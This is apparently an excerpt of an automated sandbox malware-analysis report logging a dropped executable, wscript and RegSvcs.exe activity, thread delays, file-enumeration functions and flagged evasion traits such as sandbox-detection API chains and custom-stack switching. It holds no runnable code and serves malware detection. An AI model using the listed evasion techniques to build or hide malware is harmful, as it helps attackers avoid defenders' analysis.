Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-99653

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	API/Special instruction interceptor: Address: BE52CC
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	API/Special instruction interceptor: Address: 138700C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599514	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599177	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599053	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598729	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598050	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597154	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596480	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596322	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594311	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593547	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2849			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6982			Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	API coverage: 3.8 %
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	API coverage: 4.1 %

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0096DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0096DBBE
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0093C2A2 FindFirstFileExW,	0_2_0093C2A2
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_009768EE FindFirstFileW,FindClose,	0_2_009768EE
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0097698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0097698F
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0096D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0096D076
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0096D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0096D3A9
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00979642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00979642
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0097979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0097979D
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00979B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00979B2B
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00975C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00975C97
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00FDDBBE
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FAC2A2 FindFirstFileExW,	2_2_00FAC2A2
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE68EE FindFirstFileW,FindClose,	2_2_00FE68EE
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_00FE698F
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FDD076
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FDD3A9
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FE9642
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FE979D
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00FE9B2B
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FE5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00FE5C97

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009042DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599514	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599177	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599053	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598729	Jump to behavior
